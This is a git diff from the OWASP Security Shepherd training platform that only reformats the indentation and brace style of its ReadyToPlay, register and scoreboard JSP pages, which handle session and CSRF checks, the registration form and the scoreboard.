+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Mark Denihan
+ */
+ String levelName = new String("ReadyToPlay.jsp");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+ if (request.getSession() != null)
+ {
+ 	HttpSession ses = request.getSession();
+ 	//Getting CSRF Token from client
+ 	Cookie tokenCookie = null;
+ 	try
+ 	{
+ 		tokenCookie = Validate.getToken(request.getCookies());
+ 	}
+ 	catch(Exception htmlE)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +": tokenCookie Error:" + htmlE.toString());
+ 	}
+ 	// validateSession ensures a valid session, and valid role credentials
+ 	// If tokenCookie == null, then the page is not going to continue loading
+ 	if (Validate.validateSession(ses) && tokenCookie != null)
+ 	{
+ 		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title><fmt:message key="readyToPlay.title.readyToPlay"/></title>
-    <link href="css/lessonCss/theCss.css" rel="stylesheet" type="text/css"
-          media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title><fmt:message key="readyToPlay.title.readyToPlay" /></title>
+<link href="css/lessonCss/theCss.css" rel="stylesheet" type="text/css"
+	media="screen" />
 </head>
 <body>
-<script type="text/javascript" src="js/jquery.js"></script>
-<div id="contentDiv">
-    <h2 class="title">
-        <fmt:message key="readyToPlay.title.enteredGame"/>
-    </h2>
-    <p>
-        <fmt:message key="readyToPlay.text.info.enteredGame"/>
-    </p>
-    <%= Analytics.sponsorshipMessage(new Locale(Validate.validateLanguage(request.getSession()))) %>
-    <% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-    <% } %>
-</div>
+	<script type="text/javascript" src="js/jquery.js"></script>
+	<div id="contentDiv">
+		<h2 class="title">
+			<fmt:message key="readyToPlay.title.enteredGame" />
+		</h2>
+		<p>
+			<fmt:message key="readyToPlay.text.info.enteredGame" />
+		</p>
+		<%= Analytics.sponsorshipMessage(new Locale(Validate.validateLanguage(request.getSession()))) %>
+		<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+		<% } %>
+	</div>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("loggedOutSheep.html");
+}
 %>
diff --git a/src/main/webapp/register.jsp b/src/main/webapp/register.jsp
index f950c0eff..ff023d195 100644
--- a/src/main/webapp/register.jsp
+++ b/src/main/webapp/register.jsp
@@ -1,271 +1,294 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*,org.owasp.encoder.Encode" errorPage="" %>
-<%@ include file="translation.jsp" %>
+	language="java" import="utils.*,org.owasp.encoder.Encode" errorPage=""%>
+<%@ include file="translation.jsp"%>
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: register.jsp *************************");
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: register.jsp *************************");
 
 /**
  * This file is part of the Security Shepherd Project.
- *
+ * 
  * The Security Shepherd project is free software: you can redistribute it and/or modify
  * it under the terms of the GNU General Public License as published by
  * the Free Software Foundation, either version 3 of the License, or
  * (at your option) any later version.<br/>
- *
+ * 
  * The Security Shepherd project is distributed in the hope that it will be useful,
  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  * GNU General Public License for more details.<br/>
- *
+ * 
  * You should have received a copy of the GNU General Public License
  * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
- *
+ * 
  * @author Mark Denihan
  */
-    if (OpenRegistration.isEnabled() && LoginMethod.isLogin()) {
-        HttpSession ses = request.getSession();
-        if (request.getSession() != null) {
-            if (ses.getAttribute("errorMessage") == null) {
-                ses.invalidate();
-                ses = request.getSession(true);
-                String language = request.getParameter("lang");
-                if (language != null) {
-                    ses.setAttribute("lang", language);
-                }
-            }
-            if (ses.getAttribute("userName") != null) {
-                //Logging Username
-                ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
-            }
-        }
-        String url = (request.getRequestURL()).toString();
-        if (url.contains("register.jsp")) {
-            url = url.substring(0, url.lastIndexOf("/") + 1);
-        } else {
-            response.sendRedirect("register.jsp");
-        }
+if(OpenRegistration.isEnabled() && LoginMethod.isLogin())
+{
+HttpSession ses = request.getSession();
+if(request.getSession() != null)
+{
+	if(ses.getAttribute("errorMessage") == null) 
+	{
+		ses.invalidate();
+		ses = request.getSession(true);
+		String language = request.getParameter("lang");
+		if(language != null){
+			ses.setAttribute("lang", language);
+		}
+	}
+	if(ses.getAttribute("userName") != null)
+	{
+		//Logging Username
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+	}
+}
+String url = (request.getRequestURL()).toString();
+if(url.contains("register.jsp"))
+{
+	url = url.substring(0, url.lastIndexOf("/") + 1);
+}
+else
+{
+	response.sendRedirect("register.jsp");
+}
 //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
 
-        String csrfToken = Encode.forHtml(Hash.randomString());
-        ses.setAttribute("csrfToken", csrfToken);
+String csrfToken = Encode.forHtml(Hash.randomString());
+ses.setAttribute("csrfToken", csrfToken);
 
-        String registrationSuccess = new String();
-        String errorMessage = new String();
-        String registerError = new String();
-        String userName = new String();
-        String userAddress = new String();
-        if (ses.getAttribute("errorMessage") != null) {
-            try {
-                errorMessage = Encode.forHtml(ses.getAttribute("errorMessage").toString());
-                userName = Encode.forHtmlAttribute(ses.getAttribute("userName").toString());
-                userAddress = Encode.forHtmlAttribute(ses.getAttribute("userAddress").toString());
-                ses.removeAttribute("userName");
-                ses.removeAttribute("userAddress");
-                ses.removeAttribute("errorMessage");
-            } catch (Exception e) {
-                ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Register.jsp error");
-            }
-        }
+String registrationSuccess = new String();
+String errorMessage = new String();
+String registerError = new String();
+String userName = new String();
+String userAddress = new String();
+if(ses.getAttribute("errorMessage") != null)
+{
+	try
+	{
+		errorMessage = Encode.forHtml(ses.getAttribute("errorMessage").toString());
+		userName = Encode.forHtmlAttribute(ses.getAttribute("userName").toString());
+		userAddress = Encode.forHtmlAttribute(ses.getAttribute("userAddress").toString());
+		ses.removeAttribute("userName");
+		ses.removeAttribute("userAddress");
+		ses.removeAttribute("errorMessage");
+	}
+	catch(Exception e)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Register.jsp error");
+	}
+}
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <title><fmt:message key="generic.text.ssRegister"/></title>
+<title><fmt:message key="generic.text.ssRegister" /></title>
 
-    <link href="css/theCss.css" rel="stylesheet" type="text/css"
-          media="screen"/>
+<link href="css/theCss.css" rel="stylesheet" type="text/css"
+	media="screen" />
 </head>
 <body>
-<script type="text/javascript" src="js/jquery.js"></script>
-<div id="wrapper">
-    <jsp:include page="translation-select.jsp"/>
-    <!-- start header -->
-    <div id="header">
-        <h1>Security Shepherd</h1>
-    </div>
-    <!-- end header -->
-    <!-- start page -->
-    <div id="page">
-        <!-- start content -->
-        <div id="content">
-            <div class="post" id="registerDiv">
-                <h1 class="title">
-                    <fmt:message key="generic.text.register"/>
-                </h1>
-                <%
-                    if (!errorMessage.isEmpty()) {
-                %>
-                <p>
-                    <strong><font color="red"><%=errorMessage%>
-                    </font></strong>
-                </p>
-                <%
-                    }
-                %>
-                <div id="badData"></div>
-                <form id="leForm" action="javascript:;">
-                    <div align="center">
-                        <br/>
-                        <table>
-                            <tr>
-                                <td><p>
-                                    <fmt:message key="generic.text.username"/>
-                                    <font color="red"><small>* </small></font>:
-                                </p></td>
-                                <td><input type="text" id="userName" value="<%=userName%>"
-                                           minlength="3" maxlength="32" required/></td>
-                            </tr>
-                            <tr>
-                                <td><p>
-                                    <fmt:message key="generic.text.password"/>
-                                    <font color="red"><small>* </small></font>:
-                                </p></td>
-                                <td><input type="password" id="passWord"
-                                           autocomplete="OFF" minlength="8" maxlength="512" required/></td>
-                            </tr>
-                            <tr>
-                                <td><p>
-                                    <fmt:message key="generic.text.confirmPasswd"/>
-                                    <font color="red"><small>* </small></font>:
-                                </p></td>
-                                <td><input type="password" id="passWordConfirm"
-                                           autocomplete="OFF" minlength="8" maxlength="512" required/></td>
-                            </tr>
-                            <tr>
-                                <td><p>
-                                    <fmt:message key="generic.text.emailAddr"/>
-                                    :
-                                </p></td>
-                                <td><input type="email" id="userAddress"
-                                           value="<%=userAddress%>" maxlength="128"/></td>
-                            </tr>
-                            <tr>
-                                <td><p>
-                                    <fmt:message key="generic.text.confirmEmailAddr"/>
-                                    :
-                                </p></td>
-                                <td><input type="email" id="userAddressCnf"
-                                           maxlength="128"/></td>
-                            </tr>
-                        </table>
+	<script type="text/javascript" src="js/jquery.js"></script>
+	<div id="wrapper">
+		<jsp:include page="translation-select.jsp" />
+		<!-- start header -->
+		<div id="header">
+			<h1>Security Shepherd</h1>
+		</div>
+		<!-- end header -->
+		<!-- start page -->
+		<div id="page">
+			<!-- start content -->
+			<div id="content">
+				<div class="post" id="registerDiv">
+					<h1 class="title">
+						<fmt:message key="generic.text.register" />
+					</h1>
+					<%
+				if(!errorMessage.isEmpty()) {
+			%>
+					<p>
+						<strong><font color="red"><%=errorMessage%></font></strong>
+					</p>
+					<%
+				}
+			%>
+					<div id="badData"></div>
+					<form id="leForm" action="javascript:;">
+						<div align="center">
+							<br />
+							<table>
+								<tr>
+									<td><p>
+											<fmt:message key="generic.text.username" />
+											<font color="red"><small>* </small></font>:
+										</p></td>
+									<td><input type="text" id="userName" value="<%=userName%>"
+										minlength="3" maxlength="32" required /></td>
+								</tr>
+								<tr>
+									<td><p>
+											<fmt:message key="generic.text.password" />
+											<font color="red"><small>* </small></font>:
+										</p></td>
+									<td><input type="password" id="passWord"
+										autocomplete="OFF" minlength="8" maxlength="512" required /></td>
+								</tr>
+								<tr>
+									<td><p>
+											<fmt:message key="generic.text.confirmPasswd" />
+											<font color="red"><small>* </small></font>:
+										</p></td>
+									<td><input type="password" id="passWordConfirm"
+										autocomplete="OFF" minlength="8" maxlength="512" required /></td>
+								</tr>
+								<tr>
+									<td><p>
+											<fmt:message key="generic.text.emailAddr" />
+											:
+										</p></td>
+									<td><input type="email" id="userAddress"
+										value="<%=userAddress%>" maxlength="128" /></td>
+								</tr>
+								<tr>
+									<td><p>
+											<fmt:message key="generic.text.confirmEmailAddr" />
+											:
+										</p></td>
+									<td><input type="email" id="userAddressCnf"
+										maxlength="128" /></td>
+								</tr>
+							</table>
 
-                        <br/>
-                        <div
-                                style="width: 400px; border-color: #A878EF; border-style: dashed; background-color: #D4D4D4; padding-top: 5px; padding-bottom: 5px; padding-right: 5px; padding-left: 5px;"
-                                align="justify">
-                            <center>
-                                <big style="color: #A878EF;">SHEPHERD DISCLAIMER</big>
-                            </center>
-                            <br/> <br/> The Security Shepherd project is for educational
-                            purposes only. Do not attempt to use these techniques without
-                            authorization. If you are caught engaging in unauthorized
-                            hacking, most companies will take legal action. Claiming that
-                            you were doing security research will not protect you. <br/>
-                            <br/> Security Shepherd is a safe playground for you to improve
-                            your web application security skills and only encourages white
-                            hat or ethical hacking behaviour. <br/>
-                        </div>
-                        <br/>
-                        <center>
-                            <input style="width: 350px; height: 50px;" type="submit"
-                                   name="submit" value="Sign me up!"/>
-                        </center>
+							<br />
+							<div
+								style="width: 400px; border-color: #A878EF; border-style: dashed; background-color: #D4D4D4; padding-top: 5px; padding-bottom: 5px; padding-right: 5px; padding-left: 5px;"
+								align="justify">
+								<center>
+									<big style="color: #A878EF;">SHEPHERD DISCLAIMER</big>
+								</center>
+								<br /> <br /> The Security Shepherd project is for educational
+								purposes only. Do not attempt to use these techniques without
+								authorization. If you are caught engaging in unauthorized
+								hacking, most companies will take legal action. Claiming that
+								you were doing security research will not protect you. <br />
+								<br /> Security Shepherd is a safe playground for you to improve
+								your web application security skills and only encourages white
+								hat or ethical hacking behaviour. <br />
+							</div>
+							<br />
+							<center>
+								<input style="width: 350px; height: 50px;" type="submit"
+									name="submit" value="Sign me up!" />
+							</center>
 
-                    </div>
-                </form>
-            </div>
-            <div id="resultDiv"></div>
-            <div id="loadingSign" style="display: none">
-                <p>
-                <h2 class="title">Enrolling Now</h2>
-                <p>Please wait as you are enrolled for your Security Shepherd
-                    account.</p>
-                </p>
-            </div>
-        </div>
-        <!-- end content -->
-        <!-- start sidebar -->
-        <!-- end sidebar -->
-    </div>
-</div>
-<!-- end page -->
-<script>
-    jQuery.fn.center = function () {
-        this.css("position", "absolute");
-        this.css("left", (($(window).width() - this.outerWidth()) / 2) + $(window).scrollLeft() + "px");
-        return this;
-    }
+						</div>
+					</form>
+				</div>
+				<div id="resultDiv"></div>
+				<div id="loadingSign" style="display: none">
+					<p>
+					<h2 class="title">Enrolling Now</h2>
+					<p>Please wait as you are enrolled for your Security Shepherd
+						account.</p>
+					</p>
+				</div>
+			</div>
+			<!-- end content -->
+			<!-- start sidebar -->
+			<!-- end sidebar -->
+		</div>
+	</div>
+	<!-- end page -->
+	<script>
+	jQuery.fn.center = function () 
+	{
+		this.css("position","absolute");
+		this.css("left", (($(window).width() - this.outerWidth()) / 2) + $(window).scrollLeft() + "px");
+		return this;
+	}
 
-    $("#content").center();
-
-    $(window).resize(function () {
-        $("#content").center();
-    });
-
-    $("#leForm").submit(function () {
-        $("#badData").hide("fast");
-        //Get data
-        var theName = $("#userName").val();
-        var thePass = $("#passWord").val();
-        var thePassAgain = $("#passWordConfirm").val();
-        var theEmail = $("#userAddress").val();
-        var theEmailAgain = $("#userAddressCnf").val();
-        //Validation
-        var theError = "";
-        if (thePass != thePassAgain) {
-            theError = "Passwords do not match";
-        } else if (theEmail.length != 0 && theEmail != theEmailAgain) {
-            theError = "Email addresses did not match";
-        }
-
-        //If Valid, Sent info to servlet, if not, spit out the expected error
-        if (theError == "") {
-            //alert('no error');
-            $("#registerDiv").hide("fast");
-            $("#loadingSign").show("slow");
-            $("#badData").hide("slow", function () {
-                //alert('Before Ajax');
-                var ajaxCall = $.ajax({
-                    type: "POST",
-                    url: "register",
-                    data: {
-                        userName: theName,
-                        passWord: thePass,
-                        passWordConfirm: thePassAgain,
-                        userAddress: theEmail,
-                        userAddressCnf: theEmailAgain,
-                        csrfToken: "<%=csrfToken%>"
-                    },
-                    async: false
-                });
-                if (ajaxCall.status == 200) {
-                    window.location = "login.jsp";
-                } else {
-                    $("#badData").html("<p> An Error Occurred: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-                }
-                $("#badData").show("slow", function () {
-                    $("#loadingSign").hide("fast", function () {
-                        $("#submitButton").show("slow");
-                    });
-                });
-            });
-        } else {
-            $("#badData").html("<p><font color='red'><strong>" + theError + "</strong></font></p>");
-            $("#loadingSign").hide("fast", function () {
-                $("#badData").show("slow");
-                $("#registerDiv").show("slow");
-            });
-        }
-    });
+	$("#content").center();
+	
+	$(window).resize(function() 
+	{
+		$("#content").center();
+	});
+	
+	$("#leForm").submit(function(){
+		$("#badData").hide("fast");
+		//Get data
+		var theName = $("#userName").val();
+		var thePass = $("#passWord").val();
+		var thePassAgain = $("#passWordConfirm").val();
+		var theEmail = $("#userAddress").val();
+		var theEmailAgain = $("#userAddressCnf").val();
+		//Validation
+		var theError = "";
+		if (thePass != thePassAgain)
+		{
+			theError = "Passwords do not match";
+		}
+		else if (theEmail.length != 0 && theEmail != theEmailAgain)
+		{
+			theError = "Email addresses did not match";
+		}
+		
+		//If Valid, Sent info to servlet, if not, spit out the expected error
+		if(theError == "")
+		{
+			//alert('no error');
+			$("#registerDiv").hide("fast");
+			$("#loadingSign").show("slow");
+			$("#badData").hide("slow", function(){
+				//alert('Before Ajax');
+				var ajaxCall = $.ajax({
+					type: "POST",
+					url: "register",
+					data: {
+						userName: theName,
+						passWord: thePass, 
+						passWordConfirm: thePassAgain,
+						userAddress: theEmail,
+						userAddressCnf: theEmailAgain,
+						csrfToken: "<%=csrfToken%>"
+					},
+					async: false
+				});
+				if(ajaxCall.status == 200)
+				{
+					window.location = "login.jsp";
+				}
+				else
+				{
+					$("#badData").html("<p> An Error Occurred: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+				}
+				$("#badData").show("slow", function(){
+					$("#loadingSign").hide("fast", function(){
+						$("#submitButton").show("slow");
+					});
+				});
+			});
+		}
+		else
+		{
+			$("#badData").html("<p><font color='red'><strong>" + theError + "</strong></font></p>");
+			$("#loadingSign").hide("fast", function(){
+				$("#badData").show("slow");
+				$("#registerDiv").show("slow");
+			});
+		}
+	});
 </script>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-} else {
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Sombody is trying to register (Registration is Closed)");
+	}
+else
+{
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Sombody is trying to register (Registration is Closed)");
 %>
 New account registration is disabled.
 <%
-    }
+}
 %>
diff --git a/src/main/webapp/scoreboard.jsp b/src/main/webapp/scoreboard.jsp
index 31caab1cc..f7a737cec 100644
--- a/src/main/webapp/scoreboard.jsp
+++ b/src/main/webapp/scoreboard.jsp
@@ -1,336 +1,339 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java"
-         import="dbProcs.Getter, utils.*,org.owasp.encoder.Encode" errorPage="" %>
+	language="java"
+	import="dbProcs.Getter, utils.*,org.owasp.encoder.Encode" errorPage=""%>
 
 <%
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
-            "DEBUG: scoreboard.jsp *************************");
-
-    /**
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Mark Denihan
-     */
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
-                    "DEBUG(scoreboard.jsp): tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // Also, if tokenCookie != null, then the page is good to continue loading
-        if ((Validate.validateSession(ses) && tokenCookie != null) || ScoreboardStatus.isPublicScoreboard()) {
-
-            // Getting Session Variables
-
-            String userRole = (String) ses.getAttribute("userRole");
-            boolean canSeeScoreboard = true;
-
-            canSeeScoreboard = ScoreboardStatus.canSeeScoreboard(userRole);
-
-            //Log User Name
-
-            String userName = (String) ses.getAttribute("userName");
-
-            if (userName == null) {
-                if (canSeeScoreboard) {
-
-                    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
-                            "Scoreboard accessed while not logged in");
-
-                } else {
-
-                    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
-                            "Scoreboard accessed by an unauthorized user");
-                }
-            } else {
-                ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
-                        "Scoreboard accessed by: " + userName.toString(), userName);
-            }
-
-            //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-            String csrfToken = "";
-
-            if (tokenCookie != null) {
-                csrfToken = Encode.forHtml(tokenCookie.getValue());
-            }
+	ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+			"DEBUG: scoreboard.jsp *************************");
+
+	/**
+	 * This file is part of the Security Shepherd Project.
+	 *
+	 * The Security Shepherd project is free software: you can redistribute it and/or modify
+	 * it under the terms of the GNU General Public License as published by
+	 * the Free Software Foundation, either version 3 of the License, or
+	 * (at your option) any later version.<br/>
+	 *
+	 * The Security Shepherd project is distributed in the hope that it will be useful,
+	 * but WITHOUT ANY WARRANTY; without even the implied warranty of
+	 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+	 * GNU General Public License for more details.<br/>
+	 *
+	 * You should have received a copy of the GNU General Public License
+	 * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
+	 *
+	 * @author Mark Denihan
+	 */
+	if (request.getSession() != null) {
+		HttpSession ses = request.getSession();
+		//Getting CSRF Token from client
+		Cookie tokenCookie = null;
+		try {
+			tokenCookie = Validate.getToken(request.getCookies());
+		} catch (Exception htmlE) {
+			ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+					"DEBUG(scoreboard.jsp): tokenCookie Error:" + htmlE.toString());
+		}
+		// validateSession ensures a valid session, and valid role credentials
+		// Also, if tokenCookie != null, then the page is good to continue loading
+		if ((Validate.validateSession(ses) && tokenCookie != null) || ScoreboardStatus.isPublicScoreboard()) {
+
+			// Getting Session Variables
+
+			String userRole = (String) ses.getAttribute("userRole");
+			boolean canSeeScoreboard = true;
+
+			canSeeScoreboard = ScoreboardStatus.canSeeScoreboard(userRole);
+
+			//Log User Name
+
+			String userName = (String) ses.getAttribute("userName");
+
+			if (userName == null) {
+				if (canSeeScoreboard) {
+
+					ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+							"Scoreboard accessed while not logged in");
+
+				} else {
+
+					ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+							"Scoreboard accessed by an unauthorized user");
+				}
+			} else {
+				ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+						"Scoreboard accessed by: " + userName.toString(), userName);
+			}
+
+			//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+			String csrfToken = "";
+
+			if (tokenCookie != null) {
+				csrfToken = Encode.forHtml(tokenCookie.getValue());
+			}
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <title>OWASP Security Shepherd - Scoreboard</title>
+<title>OWASP Security Shepherd - Scoreboard</title>
 
-    <link href="css/theCss.css" rel="stylesheet" type="text/css"
-          media="screen"/>
-    <link rel="shortcut icon" href="css/images/flavicon.jpg"
-          type="image/jpeg"/>
+<link href="css/theCss.css" rel="stylesheet" type="text/css"
+	media="screen" />
+<link rel="shortcut icon" href="css/images/flavicon.jpg"
+	type="image/jpeg" />
 </head>
 <body>
-<script type="text/javascript" src="js/jquery.js"></script>
-<script type="text/javascript" src="js/tinysort.js"></script>
-<div id="wrapper">
-    <!-- start header -->
-    <div id="header">
-        <h1>Scoreboard</h1>
-        <p>The OWASP Security Shepherd Project</p>
-    </div>
-    <!-- end header -->
-    <!-- start page -->
-    <div id="page">
-        <!-- start content -->
-        <div id="badData"></div>
-        <%
-            if (canSeeScoreboard) {
-        %>
-        <div id="whereistand-div"
-             style="position: fixed; left: 30px; display: none; border-bottom: 3px solid #a878ef; background: #d4d4d4; padding: 5px 5px; border-radius: 5px">
-            <input type="checkbox" id="whereistand-chk"
-                   onChange="whereistandToggle()">Where do I stand?
-        </div>
-        <ul id="leaderboard" class="leaderboard"></ul>
-        <%
-        } else {
-        %>
-        <p>Scoreboard is not currently available!</p>
-        <%
-            }
-        %>
-    </div>
-    <!-- end content -->
-    <!-- start sidebar -->
-    <!-- end sidebar -->
-</div>
-</div>
-<!-- end page -->
-<%
-    if (canSeeScoreboard) {
-%>
-<script>
-    var windowIsActive = true;
-
-    window.onfocus = function windowFocus() {
-        windowIsActive = true;
-    };
-
-    window.onblur = function windowBlur() {
-        windowIsActive = false;
-    };
-
-    function timeSince(date) {
-
-        var seconds = Math.floor((new Date() - date) / 1000);
-
-        var interval = Math.floor(seconds / 31536000);
-
-        if (interval > 1) {
-            return interval + " years";
-        }
-        interval = Math.floor(seconds / 2592000);
-        if (interval > 1) {
-            return interval + " months";
-        }
-        interval = Math.floor(seconds / 86400);
-        if (interval > 1) {
-            return interval + " days";
-        }
-        interval = Math.floor(seconds / 3600);
-        if (interval > 1) {
-            return interval + " hours";
-        }
-        interval = Math.floor(seconds / 60);
-        if (interval > 1) {
-            return interval + " minutes";
-        }
-
-        if (Math.floor(seconds) >= 60) {
-            return "1 minute"
-        } else {
-            return "< 1 minute";
-        }
-    }
-
-    var lastUpdated = new Date();
-
-    //Scoreboard based on http://mightystuff.net/dynamic-leaderboard
-    function poll() {
-        if (!windowIsActive) { //If Window/Tab is currently not in focus, wait to do the magic
-            console.log('Window not active. Waiting');
-            $("#badData").html('<center>Scoreboard last updated ' + timeSince(lastUpdated) + ' ago</center>');
-            $("#badData").show("slow");
-            t = setTimeout("poll()", 500); // try again really soon
-        } else { // Window is Active. Do Magic
-            console.log('Window Active. Refreshing');
-            var ajaxCall = $.ajax({
-                type: "POST",
-                url: 'scoreboard', // needs to return a JSON array of items having the following properties: id, score, username
-                dataType: 'json',
-                data: {
-                    csrfToken: "<%=csrfToken%>"
-                },
-                async: false,
-                success: function (o) {
-                    $("#badData").hide("fast");
-                    for (i = 0; i < o.length; i++) {
-                        if ($('#userbar-' + o[i].id).length == 0) {
-                            // this id doesn't exist, so add it to our list.
-                            var newUser = '<li class="scoreLine"><div id="userbar-' + o[i].id + '" class="scoreBar" title="' + o[i].userTitle + '" style="width: ' + o[i].scale + '\u0025;">' +
-                                '<div id="userplace-' + o[i].id + '" class="place"><h3 style="display:none;" id="user-' + o[i].id + '">' + o[i].order + '</h3>' + getGetOrdinal(o[i].place) + ': </div>'
-                                + '<div class="scoreName" >' + o[i].username
-                                + '<div id="goldMedals-' + o[i].id + '" class="medalContainer"><div style="' + o[i].goldDisplay + '"><div class="goldMedalAmountBubble">' + o[i].goldMedalCount + '</div></div></div>'
-                                + '<div id="silverMedals-' + o[i].id + '" class="medalContainer"><div style="' + o[i].silverDisplay + '"><div class="silverMedalAmountBubble">' + o[i].silverMedalCount + '</div></div></div>'
-                                + '<div id="bronzeMedals-' + o[i].id + '" class="medalContainer"><div style="' + o[i].bronzeDisplay + '"><div class="bronzeMedalAmountBubble">' + o[i].bronzeMedalCount + '</div></div></div>'
-                                + '</div><div class="scoreNumber" id="userscore-' + o[i].id + '">' + o[i].score + '</div></div></li>';
-                            $("#leaderboard").append(newUser);
-                        } else {
-                            // this id does exist
-                            //update user elements in the list item.
-                            $('#userbar-' + o[i].id).prop('title', o[i].userTitle);
-                            $('#userscore-' + o[i].id).html(o[i].score);
-                            $('#userplace-' + o[i].id).html('<h3 style="display:none;" id="user-' + o[i].id + '">' + o[i].order + '</h3>' + getGetOrdinal(o[i].place) + ': ');
-                            $('#goldMedals-' + o[i].id).html('<div style="' + o[i].goldDisplay + '"><div class="goldMedalAmountBubble">' + o[i].goldMedalCount + '</div></div></div>');
-                            $('#silverMedals-' + o[i].id).html('<div style="' + o[i].silverDisplay + '"><div class="silverMedalAmountBubble">' + o[i].silverMedalCount + '</div></div></div>');
-                            $('#bronzeMedals-' + o[i].id).html('<div style="' + o[i].bronzeDisplay + '"><div class="bronzeMedalAmountBubble">' + o[i].bronzeMedalCount + '</div></div></div>');
-                            $('#userbar-' + o[i].id).animate({
-                                width: o[i].scale + "%"
-                            }, 1300);
-                        }
-                        <%if (userName != null) {%>
-                        // Different color for current user
-                        $('#userbar-<%=ses.getAttribute("userStamp").toString()%>').css('background-color', 'green');
-
-                        <%}%>
-                    }
-                    sort();
-
-                    <%if (userName != null) {%>
-                    // Show/hide Where I stand button
-                    if ($('#userbar-<%=ses.getAttribute("userStamp").toString()%>').length == 0)
-                        $("#whereistand-div").hide();
-                    else
-                        $("#whereistand-div").show();
-                    <%}%>
-                }
-            });
